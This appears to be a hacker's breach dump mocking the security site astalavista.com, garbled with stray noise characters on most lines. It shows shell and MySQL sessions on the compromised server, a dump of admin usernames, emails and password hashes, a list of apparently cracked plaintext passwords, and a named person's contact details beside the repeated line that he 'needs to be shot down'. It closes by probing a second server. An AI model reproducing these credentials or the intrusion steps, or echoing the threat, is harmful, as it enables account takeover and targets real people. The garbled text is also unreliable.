+ Q) G1 R* t  O[snip]6 I" K6 f, f! f2 }+ a% t! a
    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>: w( W- [2 y+ `. z& g
<rss version=”2.0″>
& E+ ^1 c& R2 @' e' [    <channel>$ @+ t' b# b$ a4 M$ b# v$ B
        <title>ASTALAVISTA.com - Exploits</title>8 [# i5 N3 G  F: x, C6 G+ S
        <link>http://www.astalavista.com/exploits</link>* A8 j. z2 k' Q/ Y5 M$ k$ {* d
        <description>All availably Exploits.</description>
3 _0 y5 A+ y- P        <language>en-us</language>! @" `' S) A3 q7 {9 G' h
        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>4 H" G( j  z7 `( d! F/ v
        <docs>http://blogs.law.harvard.edu/tech/rss</docs>
/ [; k* |' Z& @1 B! }# n        <generator>Astalavista.com</generator>; t8 T# q. L# ^, P0 V
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
4 }  V- s+ r) T0 @& L  x    </channel>
* k% G% K6 {1 o7 V( ]</rss>’;
5 U% h3 ^9 Z+ \& l3 e
) M2 q: T- S" g8 q! E9 K7 k    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
% a. M) E3 a! p4 |9 r% q3 S0 Z1 S$ j        unlink (FULLPATH . ‘/feed/exploits.xml’);
; o* C$ |6 t0 b    }8 S) O9 v! Z# l

# N4 I$ C8 R0 Y3 Q1 L4 {6 ~    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
5 Y- U2 S3 y6 @6 a* K: {9 u[snip]) L+ Q+ y, Z9 y" Q. R
8 L' l, r  b- b( z; h+ s6 N  {0 t
sh-3.2$ cat exploits.sh
6 ?% P+ U4 m! J$ M1 a#!/bin/sh
1 I9 p* ~  p+ }* X2 y' y1 e$ X& i; r: N% U
###########################################################
2 w& ?* d) B7 ?( C/ {" ?#                                                         #
0 r. r- h" P7 X$ J4 L: c#   Title:        milw0rm exploits adder                  #
; `- }) p+ V; j3 {* z6 i) ^#   Description:  Add all milw0rm exploits to the         #% W5 u5 d  N. {! W
#                 Astalavista.com database                #
* m/ n7 S0 K  Q2 U3 I7 |3 r, I#                                                         #  ^& S" d. N8 [4 E
#   Company:      Astalavista Group                       #
, M. i8 L8 e# B) H7 C: }% Z#   Author:       Paulo M. Santos                         #
, d4 W" w* V" V2 l4 s" e3 ~3 g#   E-Mail:       链接标记paulo.santos@astalavista.ch             #4 ]. @# z" u8 r
#                                                         ## u. b' \* `, ?+ j6 l2 K
###########################################################
  \% T% i' h# k# X7 K% y* k) U( c
, Q+ ^: ^  P" A0 p# path
" }  e. j1 L& D# K+ W; wthis_path=/home/com/public_html/modifications/cronjobs- T. ^- \2 A9 \6 F. H

5 X8 f% S# c* q& P; M$ s# change directory' G4 \: l  ?3 q, V7 P  A
cd $this_path6 L; Q& H' n' }* L  e
cd tmp/6 g) x$ C. p0 m2 C% L9 h

, M' E& N& x- a: c# L# delete files# x0 e! [7 s  \/ ^- h/ p5 g
rm -rf milw0rm.tar.* &  f8 a4 d- s) c7 b- K
rm -rf milw0rm/ &, b* U" ^8 Q3 K1 {
% p) F% v( I- H4 L
# wget milw0rm paket& K8 X' @9 J# T- ~! ?
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
9 p. x7 }6 h  I. k* @. |! b1 T: J( b0 E8 t1 w6 e
# extract milw0rm paket
: M4 q1 {% P1 s& ~3 Ctar -xvf milw0rm.tar.bz2
" J" J0 b* u& |
  B& W/ `; q3 m& ]# change owner
5 M  S2 n; Q! Pchown -R com .
9 s  Y: X/ x4 b: uchgrp -R com .& i) v! B8 ?/ L2 d# N
  m9 C9 }( Q! w5 e# \
# execute php script, I9 n+ d  b  R+ y. s
cd $this_path  D: w) F3 k, q! Z% I7 h
php -q exploits.php
; W( Y+ p  W% u
/ V7 \( A1 {8 @# delete files
+ i% Y5 x1 D! R8 Srm -rf tmp/milw0rm.tar.*
" ]' W% u' S+ r! U$ `8 I& w* Trm -rf tmp/milw0rm/7 I; a9 r) u2 A+ h
, \- x! y0 r0 ^: |2 G5 H' M
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”: v6 r5 X! s" _: j5 P4 R2 S6 w8 s
Paulo M. Santos needs to be shot down.
: g4 m2 t5 }' C* F: y; E, l: j
" m0 X5 O; k+ `* S+ Wmysql -u contrexxuser2 -p
7 y3 d2 c4 Q5 [) L6 J- cEnter password:
" ^% V# ^$ ]! B% T* F6 S6 Q! ?Welcome to the MySQL monitor.  Commands end with ; or \g.
! ~) u# t0 h7 W3 F  I. EYour MySQL connection id is 261694' b) _) O$ H: i- ?
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
# [; F# g$ [# p
2 l& b/ C/ ^1 v+ y) I1 e8 YType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
' I! ?) e$ O$ Z1 R- m: e1 U" A1 T. N& s7 ?! B5 [3 G9 f! o
mysql> show databases;
& p6 l4 [) H1 t9 ?& H9 N2 T; j+——————–+( Z3 B) {; K& K0 e
| Database           |
, @4 J1 L1 b# y( N8 Q8 Q2 b0 f0 W2 g+——————–+
1 j& g/ z% [& Z/ N/ [. Y7 || information_schema |, A( Y: i2 R1 v# ^  m( s; d
| com_contrexx2      |
- F3 {# v- P* a7 H| com_contrexx2_live |
7 z$ m& g3 Z8 S$ @| test               |& w& b5 W3 I6 T8 o
+——————–+
1 [6 x1 Q1 S6 e4 S# X- R4 rows in set (0.00 sec)- D2 Y, F5 y# M) @9 o* j
5 P; B$ o0 l( Q$ H- Q$ u1 M2 @
mysql> use com_contrexx2_live; x  E! @2 F- D
Database changed( e* h# \7 u/ ~' W
mysql> show tables;
- L6 F3 J( ~9 w2 T2 q( }+————————————————–+" A( _* b: U6 D! G6 V
| Tables_in_com_contrexx2_live                     |
1 v6 f* j$ K: v, V2 F3 A$ |" y) a+————————————————–+
+ {' k3 K0 \- G% B5 K- Y0 V| cc_banner_counter                                |
" W, ]0 I3 Q7 e| cc_search_counter                                |, Y5 @5 \% ?/ s4 E) F! {: L$ O3 T
| contrexx_access_group_dynamic_ids                |
& n' ?8 A6 e# f6 b& V| contrexx_access_group_static_ids                 |
4 B+ S6 e) t2 ?$ k2 [| contrexx_access_rel_user_group                   |; m8 \% @7 h' R
| contrexx_access_settings                         |
4 ~. _+ n) r; b. s0 ^" q" i0 D| contrexx_access_user_attribute                   |5 n4 Y0 V6 a# c: y2 b
| contrexx_access_user_attribute_name              |
3 e4 b# V+ M3 V| contrexx_access_user_attribute_value             |7 t6 F2 D2 G. p* b* `: _
| contrexx_access_user_core_attribute              |
9 N! H9 ]- `! D. k- ^0 C& p| contrexx_access_user_groups                      |
; q! }7 C! `2 ]* z* V| contrexx_access_user_mail                        |! R- n4 l' r0 s! S% F
| contrexx_access_user_profile                     |* y. Z% p: P& l3 Q2 N, {
| contrexx_access_user_title                       |
' i! P' v5 w2 @0 L| contrexx_access_user_validity                    |  Y5 s$ b) |/ X8 J
| contrexx_access_users                            |' Z3 b* I, L; X4 u+ j1 U7 g+ ]
| contrexx_backend_areas                           |8 ]" J1 U& I1 D. @  W% E
| contrexx_backups                                 |
4 W9 I* x- N0 Z2 S| contrexx_content                                 |
4 f5 {: |5 F2 ?/ B) I8 E* b| contrexx_content_history                         |
4 i0 j9 b! }" D8 u| contrexx_content_logfile                         |
4 @% _0 V9 y( ]+ k$ b$ z# B3 j0 Q| contrexx_content_navigation                      |0 K- f+ Z5 z2 R# \+ z. \- O
| contrexx_content_navigation_history              |
6 f3 `- ~3 K  s$ K: u| contrexx_ids                                     |
3 C9 d! p, z  k* l2 f  X2 p| contrexx_languages                               |
% R1 M8 Y  k. g2 k7 @| contrexx_lib_country                             |
' ]0 N6 s3 ]  w* X| contrexx_log                                     |
8 U2 _" i! k6 m% E& J| contrexx_module_alias_source                     |
4 s1 ^6 Q3 H% T" n7 h0 ^" M| contrexx_module_alias_target                     |# ~% |" T, a- X3 ]* L1 b  U
| contrexx_module_block_blocks                     |
8 k; D3 P/ ^3 w! Y" Y! q| contrexx_module_block_rel_lang                   |
& ~: z6 L9 `* w) z7 i; q  `| contrexx_module_block_rel_pages                  |
! W& M' d9 d' V. h+ || contrexx_module_block_settings                   |
1 N0 t2 m! H& r$ h! u! R) || contrexx_module_blog_categories                  |
3 t  z  ]( q, h| contrexx_module_blog_comments                    |1 N$ ]0 O5 E' D3 u  W) c; w
| contrexx_module_blog_message_to_category         |
$ t) ~$ B$ Q( a6 q/ o, N8 b| contrexx_module_blog_messages                    |6 [+ [1 `& V& u) q% h& z! d/ |
| contrexx_module_blog_messages_lang               |
6 ]6 \! @; K5 U  t1 K| contrexx_module_blog_networks                    |
0 e, Y6 L; z: j/ T| contrexx_module_blog_networks_lang               |
$ D; k3 K2 D' b! t9 L$ K' {| contrexx_module_blog_settings                    |, g1 _) M0 V2 k" x6 j2 r8 K5 V7 Z
| contrexx_module_blog_votes                       |
8 n- Z9 J$ S8 d  Z* W| contrexx_module_calendar                         |
* c1 V! O; G' K2 I9 w| contrexx_module_calendar_access                  |- ]* a0 B5 J$ N6 L
| contrexx_module_calendar_categories              |
: C0 A' t+ b9 r" E* R| contrexx_module_calendar_form_data               |/ k9 t! E2 U) x3 G4 z
| contrexx_module_calendar_form_fields             |7 A5 ]! [& v$ s+ V( j' S) Q  v
| contrexx_module_calendar_registrations           |
6 q- C( Q4 j# n  T; B| contrexx_module_calendar_settings                |7 L- t, S9 t5 E
| contrexx_module_calendar_style                   |
' a" n; V  G# p/ I| contrexx_module_contact_form                     |
9 ~1 R3 f5 r4 {| contrexx_module_contact_form_data                |, g) Q% r  _/ E7 S  ]
| contrexx_module_contact_form_field               |
& u/ L# A* L1 K9 k) W6 K* [| contrexx_module_contact_settings                 |
! u; @0 _+ Y8 m| contrexx_module_data_categories                  |5 Y; X" Y. {, n2 R
| contrexx_module_data_message_to_category         |
9 A5 C: K& e) Y  u, U4 ]! B| contrexx_module_data_messages                    |
) o6 R7 s; ~2 @; Z# J| contrexx_module_data_messages_lang               |" r- w1 i" n9 |4 F
| contrexx_module_data_placeholders                |
) x$ \$ E3 J" Y8 Z6 G6 O$ C% y| contrexx_module_data_settings                    |
  R$ R9 N* C3 b: I2 o* e# P| contrexx_module_directory_access                 |( t4 V* ^" }. w: N6 ~% @$ K- ?* Z% O
| contrexx_module_directory_categories             |
6 t% A- ^" w: z$ F! || contrexx_module_directory_dir                    |* J4 ]7 Y) W# d* ~
| contrexx_module_directory_inputfields            |
3 y' |* p! J: p4 M| contrexx_module_directory_levels                 |5 ]$ g. {* p1 M+ U6 K4 n
| contrexx_module_directory_mail                   |
; S0 H3 g! E& `| contrexx_module_directory_rel_dir_cat            |! t8 Q% q8 \" S4 Y) O, Q
| contrexx_module_directory_rel_dir_level          |
( n: E+ {! l) B. O2 e5 y| contrexx_module_directory_settings               |
7 U$ \9 ?6 B! a3 W8 G| contrexx_module_directory_settings_google        |
6 @# G' ^7 ~6 ~2 `| contrexx_module_directory_vote                   |/ ^3 s$ k7 M7 F
| contrexx_module_docsys                           |5 i" J* z' U% e4 V! s" N# u! |
| contrexx_module_docsys_categories                |( h, _5 j. e# H$ ]
| contrexx_module_egov_configuration               |# d* ]1 T$ P3 D  Z
| contrexx_module_egov_orders                      |' e( \9 f0 q, }2 [1 |
| contrexx_module_egov_product_calendar            |
/ h+ ?: [7 T5 k1 k: s| contrexx_module_egov_product_fields              |, U. T# ~) Q8 c, t
| contrexx_module_egov_products                    |
0 n+ X0 C; |# _  g| contrexx_module_egov_settings                    |& G5 T7 w: f& Z+ n! a, C
| contrexx_module_exploits                         |
- l2 I! b" }& z! q| contrexx_module_exploits_categories              |
5 s7 D' O$ G' |$ O' k6 D. A7 q- O% w| contrexx_module_feed_category                    |0 k/ P- k2 j0 s& i4 J2 o' ?
| contrexx_module_feed_news                        |2 @7 \1 J) m4 g
| contrexx_module_feed_newsml_association          |) `0 c$ q6 E9 J# @& I( S3 G! b  X. y
| contrexx_module_feed_newsml_categories           |
: O7 d) G# S+ K. q3 T8 k| contrexx_module_feed_newsml_documents            |
8 q. D) v3 ~% t1 p0 k| contrexx_module_feed_newsml_providers            |
; f0 l" l/ @8 X9 K' P| contrexx_module_forum_access                     |, v4 x3 `0 ~+ J2 d8 K9 Y
| contrexx_module_forum_categories                 |
+ e! N0 Z0 z7 S5 V3 ?4 _2 T| contrexx_module_forum_categories_lang            |1 r: Q; G6 V9 J
| contrexx_module_forum_notification               |* A/ Z7 ?" v: P. J& x( i
| contrexx_module_forum_postings                   |
4 a- _1 a3 V5 y0 s/ || contrexx_module_forum_rating                     |, C6 x. g1 T" J/ S3 a
| contrexx_module_forum_settings                   |
& O1 v* e4 {0 d0 E| contrexx_module_forum_statistics                 |
2 S) g" n0 {: l* U5 A| contrexx_module_gallery_categories               |
" r6 t$ x# n: S. b7 V| contrexx_module_gallery_comments                 |! \( t! J) f% F4 Q2 r. ^1 q' y
| contrexx_module_gallery_language                 |
2 V3 Z/ ~! o. K' o1 e| contrexx_module_gallery_language_pics            |2 g% O7 e# L+ t) F4 s6 B
| contrexx_module_gallery_pictures                 |
7 j# Y7 J" q0 S9 w0 z, n( H| contrexx_module_gallery_settings                 |
+ V9 l6 _0 Z' Z4 e. T| contrexx_module_gallery_votes                    |" {0 j1 t; l3 X
| contrexx_module_guestbook                        |9 l# {: e8 ]" X
| contrexx_module_guestbook_settings               |
: ~9 y) J' v2 X0 v: R8 x% u+ R9 h| contrexx_module_livecam                          |
& T- @4 i! I/ D! Q, F3 ^: q| contrexx_module_livecam_settings                 |
, J( O, _6 T! O* q- A4 ~( X2 ]| contrexx_module_market                           |
5 y+ H4 O% p+ f% {$ w| contrexx_module_market_access                    |. e! @2 i$ O* t1 l- o
| contrexx_module_market_categories                |
8 ~: S' Z+ [) t. m| contrexx_module_market_mail                      |# N% R1 x7 E9 N0 i" [8 T6 j0 i+ Z
| contrexx_module_market_paypal                    |
9 ?8 Y% @/ T1 b% @  r4 Z| contrexx_module_market_settings                  |2 I) B/ x' W1 p8 _
| contrexx_module_market_spez_fields               |
2 P! Q- f/ i) i1 T| contrexx_module_mediadir_access                  |
& ^. Q7 ]9 ]# T2 \; h$ z+ z( W| contrexx_module_mediadir_categories              |
  S, b: ^/ L' a' j2 C+ B; _  X5 c| contrexx_module_mediadir_comments                |. T( V, ~6 D& o5 G% u6 X
| contrexx_module_mediadir_dir                     |* E# U- F- z! A/ c
| contrexx_module_mediadir_inputfields             |
3 v: o" V0 Y! b2 \) E& |! g2 a| contrexx_module_mediadir_levels                  |
* O. Y' A1 Z+ N( D| contrexx_module_mediadir_mail                    |
8 o( ~" o: f( S6 L" J| contrexx_module_mediadir_rel_dir_cat             |; H; T4 Y0 W; J4 F9 G1 Q9 g
| contrexx_module_mediadir_rel_dir_level           |7 d, [" S$ P7 ]
| contrexx_module_mediadir_reports                 |
2 H. C  m$ @& B$ G  G/ }| contrexx_module_mediadir_settings                |  u. W: L  }1 k, o! c# P
| contrexx_module_mediadir_settings_google         |& D0 {2 v5 F! N% Z  p* {4 I: X
| contrexx_module_mediadir_vote                    |6 p% Q  h9 u; [% j+ G0 Z
| contrexx_module_memberdir_directories            |/ L% |6 I2 @8 {8 z- J3 o/ P$ {2 Y" f
| contrexx_module_memberdir_name                   |* @+ a, w8 l$ I) e& X& ~
| contrexx_module_memberdir_settings               |' }: {% x5 }/ L$ p, C3 |" x# B
| contrexx_module_memberdir_values                 |5 ~5 S. F+ ~8 I$ L- P/ o; B
| contrexx_module_nettools_allowed_groups          |
5 x: n0 |) _- d! q, l| contrexx_module_nettools_settings                |- O" X4 u- X0 E8 Z
| contrexx_module_news                             |
  h; s9 ?" [9 P- v( i& T& _| contrexx_module_news_access                      |
* T4 _" m9 w. {  K2 b| contrexx_module_news_categories                  |$ L8 h# P! P- _( @  C
| contrexx_module_news_settings                    |& m& X! j4 `: G1 H
| contrexx_module_news_teaser_frame                |
4 T8 E) Y- X: y5 R6 d" k  f; B! c| contrexx_module_news_teaser_frame_templates      |
" C( ?$ q4 Y1 A2 Y4 E; P& F9 b& N2 n| contrexx_module_news_ticker                      |
, F/ q# H# e  ?1 p| contrexx_module_newsletter                       |4 Y* Y7 e- {5 I& q' L
| contrexx_module_newsletter_attachment            |
# O1 E3 X& ?# z. G" k| contrexx_module_newsletter_category              |4 |7 |8 T( T, c
| contrexx_module_newsletter_confirm_mail          |6 D9 [3 x5 n2 P$ J" q% I
| contrexx_module_newsletter_rel_cat_news          |0 n  k4 @3 G7 E% t" K
| contrexx_module_newsletter_rel_user_cat          |
5 z! u  m1 m. R| contrexx_module_newsletter_settings              |
: V3 q' z% I" H+ W' ^' Z0 n| contrexx_module_newsletter_template              |
3 ^  ]! S/ h& C) _& Z2 R| contrexx_module_newsletter_tmp_sending           |
4 ~- n7 V% N; {  n/ U| contrexx_module_newsletter_user                  |5 x; z: w% T$ X! K1 Z8 Q
| contrexx_module_newsletter_user_title            |3 e2 P: Y1 U1 o/ d
| contrexx_module_onlinetools_defaultports         |
" }8 a6 D, D4 y# V8 v. d| contrexx_module_onlinetools_defaultports_back    |
1 u2 C8 z. n1 Q5 ~| contrexx_module_onlinetools_geolitecity_blocks   |* X! A6 j2 U, a. D; W
| contrexx_module_onlinetools_geolitecity_country  |
  n% Y6 e  {+ ~3 s( Y| contrexx_module_onlinetools_geolitecity_location |
" C' |) P! C) N2 t| contrexx_module_podcast_category                 |- j3 Q) @/ V  }: H
| contrexx_module_podcast_medium                   |
- t  N' k1 t1 M" || contrexx_module_podcast_rel_category_lang        |9 u$ W6 ~# J& g# ^, X1 ?! S
| contrexx_module_podcast_rel_medium_category      |3 P- a2 w, N+ n7 n
| contrexx_module_podcast_settings                 |0 o) m+ p2 x' I
| contrexx_module_podcast_template                 |2 w4 y2 d: B5 h9 @
| contrexx_module_proxydb                          |8 g4 ?$ e. Z1 r( g' P1 ^
| contrexx_module_recommend                        |
% o* W$ B( M2 ~4 p. m| contrexx_module_repository                       |7 E+ `8 p% g; Z0 I8 `3 Q0 [
| contrexx_module_securitynews_cats                |# Y& K- w! z* c8 V! B; e
| contrexx_module_securitynews_feeds               |
# U4 [  k5 c( ?1 T/ M" s. ]5 y| contrexx_module_securitynews_news                |
% K" W' y; W' p# v9 B/ u' M| contrexx_module_shop_categories                  |
# {8 K5 Z) z! Q- T- W1 a; A5 B7 `| contrexx_module_shop_config                      |
' o3 m3 p! b4 v. |9 V( Q| contrexx_module_shop_countries                   |
- g, f6 \; K' r; C3 x| contrexx_module_shop_currencies                  |
. L' f* w) P1 Z  E. n. t0 _+ g| contrexx_module_shop_customers                   |0 E. l: U/ M) @; x. C! f0 `7 ?9 V
| contrexx_module_shop_importimg                   |
% U; d" x2 \& C# I  u| contrexx_module_shop_lsv                         |
3 |. P( g/ b% v- ]| contrexx_module_shop_mail                        |
0 b% o! K, E( E( y- s0 `% q| contrexx_module_shop_mail_content                |
7 L3 G4 y# @% `  O| contrexx_module_shop_manufacturer                |
! C8 e2 i" [7 k( v6 q- y| contrexx_module_shop_order_items                 |( s+ g% L, S0 U, g" g% P: g/ I
| contrexx_module_shop_order_items_attributes      |# ]0 ?  i: L- r, X$ \% z
| contrexx_module_shop_orders                      |
0 ]" C* N! x  ?6 ^/ A| contrexx_module_shop_payment                     |/ Y0 I' s6 s" M" w5 H) K8 d) G* B$ I) U
| contrexx_module_shop_payment_processors          |
% v' x9 V4 Q- A0 o" |0 M| contrexx_module_shop_pricelists                  |
9 T+ I- h9 u1 j; E3 S0 s. g| contrexx_module_shop_products                    |2 {7 U$ C4 F" K3 U9 C/ ?
| contrexx_module_shop_products_attributes         |
3 I9 j# K; U) ~% N| contrexx_module_shop_products_attributes_name    |
- y2 k; M  V) @; {! E| contrexx_module_shop_products_attributes_value   |/ y" {: \% i9 @1 ]3 F7 W
| contrexx_module_shop_products_downloads          |
. D$ }( c" |% U. O! s2 O| contrexx_module_shop_rel_countries               |
; k5 R: Y" R! B+ s$ m# `* k( ]: h| contrexx_module_shop_rel_payment                 |! X! G1 P& A: P8 R& R
| contrexx_module_shop_rel_shipment                |, [) w1 N0 P! w+ U& y- ^! ?6 ?2 S
| contrexx_module_shop_shipment_cost               |/ U% ]+ H. }0 d6 L. Y( K  y
| contrexx_module_shop_shipper                     |
' Q2 _( }5 I/ f. D* G& l/ C| contrexx_module_shop_vat                         |
8 f: Q4 r( b6 b' U8 D2 D| contrexx_module_shop_zones                       |2 C, `. Z- R, V
| contrexx_module_u2u_address_list                 |
3 Y7 ~% z5 u$ ^5 v| contrexx_module_u2u_message_log                  |* l' S9 R0 k9 g4 P8 }8 t! s9 r
| contrexx_module_u2u_sent_messages                |
6 }- z) G: s! V! {8 G& D| contrexx_module_u2u_settings                     |5 H" `1 I3 _% E6 i( |  Z" o
| contrexx_module_u2u_user_log                     |
, c6 t0 }6 u8 @| contrexx_modules                                 |
  W& {( f3 C0 ?' |/ a) d| contrexx_sessions                                |
+ ]" Z7 p8 u7 D6 X$ q* y) i8 A| contrexx_settings                                |
4 H3 I# `% O% Z, K" x+ V& q4 || contrexx_settings_smtp                           |
$ l2 w4 L6 H; D8 k| contrexx_skins                                   |4 U1 b9 d# M3 |# s( U
| contrexx_stats_browser                           |
8 o! @- M6 P/ h1 O" r# H| contrexx_stats_colourdepth                       |
( _) G9 y) i; Z% F" u0 t$ m| contrexx_stats_config                            |
3 R, ]* K8 P  M' @9 R2 l| contrexx_stats_country                           |
- U5 O+ [- u5 ?# V% N| contrexx_stats_hostname                          |5 I& W$ b  e! X3 b5 G
| contrexx_stats_javascript                        |
' C3 _8 B1 E5 L* i5 ~" t| contrexx_stats_operatingsystem                   |) G- B0 R/ G; C5 P2 l" Q8 \% _: v+ B, v2 s
| contrexx_stats_referer                           |
/ i/ L% v. W1 U4 v| contrexx_stats_requests                          |" e1 f+ f) A. o' U3 k
| contrexx_stats_requests_summary                  |; D1 A& n' y9 j8 u; ]( |" k5 o
| contrexx_stats_screenresolution                  |* C- A! l6 y9 t: ~: \1 n' M) b3 Q3 Z
| contrexx_stats_search                            |" e+ z  A. Q) K) U: z& J
| contrexx_stats_spiders                           |3 j2 {9 I7 O; Y
| contrexx_stats_spiders_summary                   |
& A$ A2 [( ]3 r: n, j7 Z: r( R  T| contrexx_stats_visitors                          |, b/ X+ E, w7 A0 K
| contrexx_stats_visitors_summary                  |
, v9 _- j' v9 d* b) q0 r| contrexx_voting_additionaldata                   |& H* b3 O, b' P( w; c" o: B
| contrexx_voting_email                            |: x* x1 \& Z" g( Q0 U' @4 l
| contrexx_voting_rel_email_system                 |
% @( z% x: p0 D* |2 m| contrexx_voting_results                          |% t% c- e+ a* s4 B/ H2 p
| contrexx_voting_system                           |/ u3 B1 ~" R2 [
| foo                                              |
5 V3 \  C' W( I. r+————————————————–+5 G- N- g' O" ^: g0 \
227 rows in set (0.01 sec)2 e  B' e0 k6 Q4 K
! Y+ W. S: M! B6 S+ n
mysql> select count(*) as skids from contrexx_access_users;
5 X+ Z; N" }4 t; _6 W+——-+
9 X& T" {! G2 h| skids |) r* Z  n+ R( F& }5 V+ k. t/ v) z7 K
+——-+, C/ j$ ?( i" |; \" j5 S
| 53699 |
! {! K1 }. R3 s/ E5 Q) K: `9 g5 Q0 v. O+——-+
+ C1 |; l# o6 i: Y4 p; R/ c. w: k1 row in set (0.00 sec); ~2 t& O- j* W& ~. T/ z

+ N" J  B# [6 ^. n6 f  m: [mysql> describe contrexx_access_users;) V4 m5 U; t7 w: F4 Z9 C
+——————+——————————————+——+—–+————–+—————-+# Y3 f0 e; P& |3 l! q+ @
| Field            | Type                                     | Null | Key | Default      | Extra          |
0 r7 V) Q) Q- ]! R, |+——————+——————————————+——+—–+————–+—————-+
& n" |2 ?, h; s  w" k4 Z| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |4 R' i6 j2 e& L( l" a
| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |4 B- e: _  a! N9 a: @, t9 t) d
| username         | varchar(40)                              | YES  | MUL | NULL         |                |( G' n$ A9 d; a5 _% u
| password         | varchar(32)                              | YES  |     | NULL         |                |
& g. t$ f- U" d* L  b/ y| regdate          | int(14) unsigned                         | NO   |     | 0            |                |) `0 @* g3 `) \; @
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |+ m  N  h) N! H* V4 J
| validity         | int(10) unsigned                         | NO   |     | 0            |                |" }4 A( a; T* C, D
| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |6 y: R  `; Q, S5 a
| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |2 W1 p8 O/ ?9 b2 Z& u
| email            | varchar(255)                             | YES  |     | NULL         |                |) c: f6 X6 D! j
| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |( O  m+ k& J' i" P% l# m, Y( |
| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
) r9 W& x1 f! M3 Q; }! v7 K6 \| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |, D: b/ S: o0 A" \( X
| active           | tinyint(1)                               | NO   |     | 0            |                |0 j' X& O( B6 q8 R$ v! S
| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
1 ^6 |; w8 s& P8 g2 a| restore_key      | varchar(32)                              | NO   |     |              |                |) N; {6 z  H4 m  B4 M' L
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |* n( |( A1 o4 m4 Z8 ~; X  j. N, X" H
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |* G$ v8 M+ D3 A/ X8 X) S
+——————+——————————————+——+—–+————–+—————-+
0 [5 @, H* u1 \18 rows in set (0.00 sec)* A' a+ I. S$ o# J

& k1 f# ~1 j- ~3 b8 V) x) Y& S' nmysql> select username,password,email from contrexx_access_users where is_admin = 1;. V, c4 _  S! T7 |
+————+———————————-+—————————–+
0 |. k6 m* ?  n5 T; D$ [1 B| username   | password                         | email                       |
0 S+ `! l' X$ H% k" {$ V+————+———————————-+—————————–+
4 n, ^7 c- R1 \2 d2 e$ {& e| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |
) u7 z- B8 q0 E% }( O3 ?| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
: l- |$ W$ n  \* k/ \8 x# C* Y| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |& \3 B7 Q7 W' h5 H3 e
| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |
6 `$ C/ H3 n$ a3 G5 J8 R1 S+————+———————————-+—————————–+
8 r7 ]" k. Y  G! E" B; p  A4 rows in set (0.04 sec)
( @: T6 c, q! V3 v7 l& y( [/ D: M: S/ o8 P" f5 C, p$ g7 Z* C3 u
mysql> exit;
' g% c: W2 b! H, Y0 n+ L( SBye. {; r" m9 Y/ f9 |! z3 ^

2 k' ?: k, _+ ]9 z/ ~# Z( z[~] There you go, your “team of security and IT professionals” is a joke.
" y" K  Z  S3 r+ O3 E! G
3 i1 a: c- _/ L8 Q7 [5 v/ a+——————————+
3 @% n$ d. s' c$ a( Y8 F! K/ b% |system:f82BN3+_*
- U+ b! Y, @5 M& {8 b/ O2 p: PBe1er0ph0r:belerophor4astacom
" \$ c& O' g. S9 O) e8 p$ ^prozac:asta4cms!; N) T- J1 `4 v8 Z% B$ ?
commander:mpbdaagf6m
  z+ v# \8 `! l! nsykadul:ak29eral
& d; N1 a, I8 e. G$ [$ Z- P+——————————+
* d6 ~; ^( I: [% C7 s$ Y. j4 V! d& U) L' M# d
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
  L$ W) r. E! k$ q) [9 f. s…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.+ V: e  Z( j* j, n2 |( l" q

2 U5 S8 w- `: r; G3 ^# W[~] Lets move to astalavista.net now,
6 E3 }0 Q: _. \6 X( U" r# b! o, c/ O4 n1 q- |+ _$ {7 x
From <链接标记[url]https://www.astalavista.net/[/url]>:
6 E2 l! K! y2 T: q2 e9 g>> Everyone knows that the best defense is a good offense.! a6 e' k- E5 ]" h+ v& u
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
/ k" q8 a+ `# Z0 a1 A>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.9 D% w" k) @, ]9 r/ f
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
  @" A. J- f/ X) Y0 M3 m0 Z
1 c7 i5 g- y" T>> Go ahead, try and hack our server . in a completely legal way!# `8 J2 b$ T- o. X/ ^1 }; {& ~
>> Learn by doing: We offer our members tricky tasks and challenges on an+ ^- @" K8 r, s, s- v
>> ongoing basis so you can test your knowledge and abilities. You can also. O2 P% }- w" T6 Z. p# n; r
>> demonstrate what you.ve mastered by taking part in regular hacker contests
, L7 z1 Y# `" E) U>> and war games- r9 o% Q7 I$ V1 g
$ P" r3 {, a6 E/ W3 ]! h
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
7 q3 g7 E5 M& f( @
9 f( [1 o. L0 M[-] Tricky task: Find home dir of astalavista.net
" \' {# z4 N- g' T; ?: P0 A0 I: L1 i
sh-3.2$ ls -la ~astanet3 @' z0 P( @" s! p5 O5 y
total 484 u! E7 p& D) a
drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
& n3 W6 \$ e7 V' f) \drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
